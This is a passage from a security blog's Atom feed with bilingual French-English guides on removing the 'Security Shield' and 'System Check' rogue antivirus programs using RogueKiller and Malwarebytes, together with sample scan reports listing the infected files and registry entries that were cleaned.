&lt;u&gt;&lt;i&gt;&lt;b&gt;2011/11/23 Update&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;:&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
This rogue comes back these days with the same functionnal, name and GUI.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-NqLn1aNHZU8/T2xUEa0gQDI/AAAAAAAAAFo/KFQNEBNWjWc/s1600/Capture.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="172" src="http://4.bp.blogspot.com/-NqLn1aNHZU8/T2xUEa0gQDI/AAAAAAAAAFo/KFQNEBNWjWc/s640/Capture.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
_______________________________________&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode "Scan" -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode Scan&lt;/li&gt;
&lt;li&gt;S'il ne peut pas se lancer, renommez le en "&lt;b&gt;winlogon.exe&lt;/b&gt;" ou "&lt;strong&gt;RogueKiller.com&lt;/strong&gt;" -- Il you are unable to lauch it, rename it as "&lt;b&gt;winlogon.exe&lt;/b&gt;" or "&lt;strong&gt;RogueKiller.com&lt;/strong&gt;"&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V7.3.2 [20/03/2012] par Tigzy&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;Blog: http://tigzyrk.blogspot.com&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur: Administrateur [Droits d'admin]&lt;br /&gt;Mode: Recherche -- Date: 23/03/2012 11:30:54&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux: 2 ¤¤¤&lt;br /&gt;[WINDOW : Security Shield] syecx.exe -- C:\Documents and Settings\Administrateur\Local Settings\Application Data\syecx.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;[SUSP PATH] syecx.exe -- C:\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\syecx.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;&lt;br /&gt;¤¤¤ Entrees de registre: 0 ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Driver: [CHARGE] ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Infection : Rogue.AntiSpy-ST ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichier HOSTS: ¤¤¤&lt;br /&gt;127.0.0.1       localhost&lt;br /&gt;::1             localhost&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;¤¤¤ MBR Verif: ¤¤¤&lt;br /&gt;&lt;br /&gt;+++++ PhysicalDrive0: VBOX HARDDISK +++++&lt;br /&gt;--- User ---&lt;br /&gt;[MBR] c708b764ca9daa4f8f33e4e8b3b517da&lt;br /&gt;[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code&lt;br /&gt;Partition table:&lt;br /&gt;0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 63 | Size: 4086 Mo&lt;br /&gt;User = LL1 ... OK!&lt;br /&gt;User = LL2 ... OK!&lt;br /&gt;&lt;br /&gt;Termine : &amp;lt;&amp;lt; RKreport[1].txt &amp;gt;&amp;gt;&lt;br /&gt;RKreport[1].txt&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;span style="font-size: x-small;"&gt;&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue must have been deleted&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/itIympjLqgY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/4606831509788443057/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/03/rogue-security-shield.html#comment-form" title="24 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/4606831509788443057?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/4606831509788443057?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/itIympjLqgY/rogue-security-shield.html" title="[Rogue] Security Shield" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-ltvRBRrw_GA/T2xSd7Mq65I/AAAAAAAAAFg/7iGRe2DpXtw/s72-c/Capture.PNG" height="72" width="72" /><thr:total>24</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/03/rogue-security-shield.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEcCSHg6cSp7ImA9WhVRFEQ.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-5278060698936705967</id><published>2012-03-23T02:17:00.000-07:00</published><updated>2012-03-23T02:47:49.619-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-03-23T02:47:49.619-07:00</app:edited><title>[Rogue] System Check / System restore</title><content type="html">&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer System Check / System Restore&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;System Check / System Restore&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt; &lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WcHLv5JtjSo/TirlUC7coPI/AAAAAAAAAD0/hEOFrBxEi5M/s1600/zsgu1.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-1gNTn4xiKuU/TrUApT7VICI/AAAAAAAAAEY/9Qc2rFGaFz0/s1600/Sans+titre.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="419" src="http://4.bp.blogspot.com/-1gNTn4xiKuU/TrUApT7VICI/AAAAAAAAAEY/9Qc2rFGaFz0/s640/Sans+titre.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-j7FvSvWv5e0/TqEKzp9468I/AAAAAAAAAEQ/DZzvw--z6r8/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-r0iI6TX79s0/TpkrxV33MYI/AAAAAAAAAEI/--WzBM6s4Tk/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-iDLiGcASxzA/TktcYVa1o3I/AAAAAAAAAEA/JT95oCJub08/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-dyQaOpMW0UE/Tir4RlfaOgI/AAAAAAAAAD8/dTpdiLw9Yus/s1600/Capture.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/_i4tSOn5FkM/0.jpg" height="416" width="500"&gt;&lt;param name="movie" value="http://www.youtube.com/v/_i4tSOn5FkM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;








&lt;param name="bgcolor" value="#FFFFFF" /&gt;








&lt;embed width="500" height="416"  src="http://www.youtube.com/v/_i4tSOn5FkM?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;Mise à jour du 23/03/2012:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Ce
 Rogue à lancé une nouvelle campagne ces derniers jours.&lt;br /&gt;
Ayant mis à jour RogueKiller (interface graphique), il est important de lire cette note:&lt;br /&gt;
* En lieu et place des modes 1 et 2, il y a maintenant des boutons "Scan" et "Suppression". &lt;br /&gt;
* A la place du mode 6, il faut utiliser le bouton "Raccourci RAZ"&lt;br /&gt;
* Il est &lt;b&gt;&lt;span style="color: red;"&gt;très important&lt;/span&gt;&lt;/b&gt; &amp;nbsp;de ne PAS utiliser de nettoyeurs comme CCleaner avec cette infection, au risque de perdre les données stockées par le rogue dans les dossiers temporaires (il s'agit des raccourcis du bureau, du menu démarrer et de la barre de lancement rapide). Dans le cas contraire, le mode "Raccourci RAZ" de RogueKiller ne pourra pas les restaurer.&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;2012/03/23 Update&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;:&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
This rogue comes back these days. Due to the update of RogueKiller (GUI), it's important to read carefully this note:&lt;br /&gt;
* Instead of the modes 1 and 2, there's now the "Scan" and "Delete" buttons&lt;br /&gt;
* Instead of the mode 6, there's now the "Shortcut Fix" button.&lt;br /&gt;
* It's &lt;b&gt;&lt;span style="color: red;"&gt;very important&amp;nbsp;&lt;/span&gt;&lt;/b&gt;NOT to use cleaners like CCleaner with this malware, otherwise you could lose all datas stored in the temp folders by the malware (shortcuts from the start menu, desktop and quick launch). In this case, the "Shortcut Fix" mode of RogueKiller will not be able to restore them.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
_______________________________________&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;i&gt;&lt;u&gt;&lt;b&gt;Mise à jour du 23/11/2011:&lt;/b&gt;&lt;/u&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
Ce
 Rogue à lancé une nouvelle campagne ces derniers jours, employant 
exactement le même fonctionnel, un nom différent et presque la même 
interface. (System Fix)&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;2011/11/23 Update&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;:&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
This rogue comes back these days with the same functionnal, different name and nearly the same GUI. (System Fix)&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-mQqCMh1jcgM/Ttv_ReMIQ_I/AAAAAAAAAFI/4OZtkakdmWE/s1600/Sans+titre.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="254" src="http://2.bp.blogspot.com/-mQqCMh1jcgM/Ttv_ReMIQ_I/AAAAAAAAAFI/4OZtkakdmWE/s640/Sans+titre.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
_______________________________________&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;S'il ne peut pas se lancer, renommez le en "&lt;b&gt;winlogon.exe&lt;/b&gt;" -- Il you are unable to lauch it, rename it as "&lt;b&gt;winlogon.exe&lt;/b&gt;" &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V6.1.7 [03/11/2011] par Tigzy&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;Blog: http://tigzyrk.blogspot.com&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;Mode: Suppression -- Date : 05/11/2011 09:54:15&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux: 3 ¤¤¤&lt;br /&gt;[SUSP PATH] SIyHoyHlXaPT.exe -- C:\Documents and Settings\All Users\Application Data\SIyHoyHlXaPT.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;[SUSP PATH] 6DSS92c31Apgjk.exe -- C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;[SUSP PATH] P1kAlMiG2Kb7Fz.exe -- C:\DOCUME~1\tigzy\LOCALS~1\Temp\P1kAlMiG2Kb7Fz.exe -&amp;gt; KILLED [TermProc]&lt;br /&gt;&lt;br /&gt;¤¤¤ Entrees de registre: 5 ¤¤¤&lt;br /&gt;[SUSP PATH] HKLM\[...]\Run : SIyHoyHlXaPT.exe (C:\Documents and Settings\All Users\Application Data\SIyHoyHlXaPT.exe) -&amp;gt; DELETED&lt;br /&gt;[HJPOL] HKCU\[...]\System : DisableTaskMgr (1) -&amp;gt; DELETED&lt;br /&gt;[HJPOL] HKLM\[...]\System : DisableTaskMgr (1) -&amp;gt; DELETED&lt;br /&gt;[HJPOL] HKCU\[...]\Explorer : NoDesktop (1) -&amp;gt; DELETED&lt;br /&gt;[WallPP] HKCU\[...]\Desktop : Wallpaper () -&amp;gt; REPLACED (C:\WINDOWS\web\wallpaper\Colline verdoyante.bmp)&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Driver: [LOADED] ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Infection :&amp;nbsp; ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Fichier HOSTS: ¤¤¤&lt;br /&gt;127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;&lt;br /&gt;Termine : &amp;lt;&amp;lt; RKreport[1].txt &amp;gt;&amp;gt;&lt;br /&gt;RKreport[1].txt&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Relancer RogueKiller &lt;b&gt;avec le mode 6 &lt;/b&gt;pour rétablir les attributs des fichiers masqués par le rogue. Vous devriez avoir le rapport suivant -- Start RogueKiller again &lt;b&gt;with mode 6&lt;/b&gt; to reset attributes on files hidden by the rogue. You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V6.1.7 [03/11/2011] par Tigzy&lt;br /&gt;mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;Blog: http://tigzyrk.blogspot.com&lt;/span&gt;&lt;span style="font-size: x-small;"&gt;&lt;br /&gt;&lt;br /&gt;Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;Demarrage : Mode normal&lt;br /&gt;Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;Mode: Raccourcis RAZ -- Date : 05/11/2011 09:55:05&lt;br /&gt;&lt;br /&gt;¤¤¤ Processus malicieux: 0 ¤¤¤&lt;br /&gt;&lt;br /&gt;¤¤¤ Driver: [LOADED] ¤¤¤&lt;br /&gt;&lt;br /&gt;Attributs de fichiers restaures: &lt;br /&gt;Bureau: Success 798 / Fail 0&lt;br /&gt;Lancement rapide: Success 4 / Fail 0&lt;br /&gt;Programmes: Success 2409 / Fail 0&lt;br /&gt;Menu demarrer: Success 139 / Fail 0&lt;br /&gt;Dossier utilisateur: Success 305 / Fail 0&lt;br /&gt;Mes documents: Success 48 / Fail 0&lt;br /&gt;Mes favoris: Success 11 / Fail 0&lt;br /&gt;Mes images: Success 0 / Fail 0&lt;br /&gt;Ma musique: Success 0 / Fail 0&lt;br /&gt;Mes videos: Success 0 / Fail 0&lt;br /&gt;Disques locaux: Success 10477 / Fail 0&lt;br /&gt;Sauvegarde: [FOUND] Success 96 / Fail 1&lt;br /&gt;&lt;br /&gt;Lecteurs:&lt;br /&gt;[C:] \Device\HarddiskVolume1 -- 0x3 --&amp;gt; Restored&lt;br /&gt;[D:] \Device\CdRom0 -- 0x5 --&amp;gt; Skipped&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ¤¤¤ Infection : Fake HDD&amp;nbsp; ¤¤¤&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Termine : &amp;lt;&amp;lt; RKreport[2].txt &amp;gt;&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; RKreport[1].txt ; RKreport[2].txt&lt;/span&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;div style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;Malwarebytes' Anti-Malware 1.51.2.1300&lt;br /&gt;www.malwarebytes.org&lt;br /&gt;&lt;br /&gt;Version de la base de données: 8089&lt;br /&gt;&lt;br /&gt;Windows 5.1.2600 Service Pack 3&lt;br /&gt;Internet Explorer 6.0.2900.5512&lt;br /&gt;&lt;br /&gt;05/11/2011 10:15:14&lt;br /&gt;mbam-log-2011-11-05 (10-15-13).txt&lt;br /&gt;&lt;br /&gt;Type d'examen: Examen complet (C:\|)&lt;br /&gt;Elément(s) analysé(s): 169251&lt;br /&gt;Temps écoulé: 9 minute(s), 40 seconde(s)&lt;br /&gt;&lt;br /&gt;Processus mémoire infecté(s): 0&lt;br /&gt;Module(s) mémoire infecté(s): 0&lt;br /&gt;Clé(s) du Registre infectée(s): 0&lt;br /&gt;Valeur(s) du Registre infectée(s): 0&lt;br /&gt;Elément(s) de données du Registre infecté(s): 7&lt;br /&gt;Dossier(s) infecté(s): 0&lt;br /&gt;Fichier(s) infecté(s): 9&lt;br /&gt;&lt;br /&gt;Processus mémoire infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Module(s) mémoire infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Clé(s) du Registre infectée(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Valeur(s) du Registre infectée(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Elément(s) de données du Registre infecté(s):&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowControlPanel (PUM.Hijack.StartMenu) -&amp;gt; Bad: (0) Good: (1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowHelp (PUM.Hijack.StartMenu) -&amp;gt; Bad: (0) Good: (1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowMyComputer (PUM.Hijack.StartMenu) -&amp;gt; Bad: (0) Good: (1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowMyDocs (PUM.Hijack.StartMenu) -&amp;gt; Bad: (0) Good: (1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowRun (PUM.Hijack.StartMenu) -&amp;gt; Bad: (0) Good: (1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowSearch (PUM.Hijack.StartMenu) -&amp;gt; Bad: (0) Good: (1) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp (PUM.Hijack.Help) -&amp;gt; Bad: (1) Good: (0) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;&lt;br /&gt;Dossier(s) infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Fichier(s) infecté(s):&lt;br /&gt;c:\documents and settings\all users\application data\6dss92c31apgjk.exe (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\all users\application data\fgniibr2lcq8x8l.exe (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\all users\application data\siyhoyhlxapt.exe (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\Bureau\rk_quarantine\6dss92c31apgjk.exe.vir (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\Bureau\rk_quarantine\siyhoyhlxapt.exe.vir (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\local settings\Temp\p5tm1qbi6dss92.exe.tmp (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZDRB2Q2A\fakehdd[2].vir (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZDRB2Q2A\systemrestore[1].vir (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\RECYCLER\s-1-5-21-1123561945-1202660629-682003330-1003\Dc6\fgniibr2lcq8x8l.exe.vir (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-size: x-small;"&gt;
&lt;span style="color: #666666;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue must have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/NK1wsj9LceU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/5278060698936705967/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/11/rogue-system-restore.html#comment-form" title="108 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5278060698936705967?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5278060698936705967?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/NK1wsj9LceU/rogue-system-restore.html" title="[Rogue] System Check / System restore" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-1gNTn4xiKuU/TrUApT7VICI/AAAAAAAAAEY/9Qc2rFGaFz0/s72-c/Sans+titre.PNG" height="72" width="72" /><thr:total>108</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/11/rogue-system-restore.html</feedburner:origLink></entry><entry 